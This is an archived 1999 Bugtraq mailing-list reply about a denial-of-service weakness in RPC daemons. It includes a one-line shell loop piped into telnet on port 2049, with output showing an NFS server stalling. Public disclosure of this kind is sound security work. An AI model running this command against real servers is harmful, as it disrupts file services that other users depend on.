Bugtraq mailing list archives
Re: KKIS.08041999.001.b - security raport - flaws in rpc part of
From: peter () ATTIC VUURWERK NL (Peter van Dijk)
Date: Thu, 15 Apr 1999 21:46:34 +0200
On Wed, Apr 14, 1999 at 03:26:14PM +0200, Lukasz Luzar wrote:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### ### ### ### ### ### ### ### ### ### ###### ###### ### ### ### ### ### ### ### ### ### ### ### S E C U R I T Y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ KKI Security Team Cracow Commercial Internet, Poland http://www.security.kki.pl http://www.kki.pl mailto:security () security kki pl mailto:biuro () kki pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Raport title : Lack of RPC's implementation in libc libraries and how it affects for example portmap.
A much easier DOS is obtained by connecting to an RPC port and just sending some random (most will do) garbage every 5 seconds. Note that this _does_ affect the UDP services in the same daemons. I have seen this bug in _every_ RPC implementation, with a few exceptions: mcserv (which does not really use the RPC protocol, only the portmapper), Sun's own nfsd [although their portmapper is buggy], and NetApp boxes. To wit: [root@koek] ~# ( while true ; do echo ; sleep 5 ; done ) | telnet zopie 2049 Trying 10.10.13.1... Connected to zopie.attic.vuurwerk.nl. Escape character is '^]'. NFS server zopie not responding, still trying. Connection closed by foreign host. [root@koek] ~# NFS server zopie OK. Right after I started the telnet, I switched to another VC and did ls /zopie, the NFS mounted disk. The ls did not give any output until I ctrl-C'ed the telnet. Greetz, Peter -- | 'He broke my heart, | Peter van Dijk | I broke his neck' | peter () attic vuurwerk nl | nognixz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl | | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
Current thread:
- Re: KKIS.08041999.001.b - security raport - flaws in rpc part of Peter van Dijk (Apr 15)
- <Possible follow-ups>
- Re: KKIS.08041999.001.b - security raport - flaws in rpc part of Olaf Kirch (Apr 16)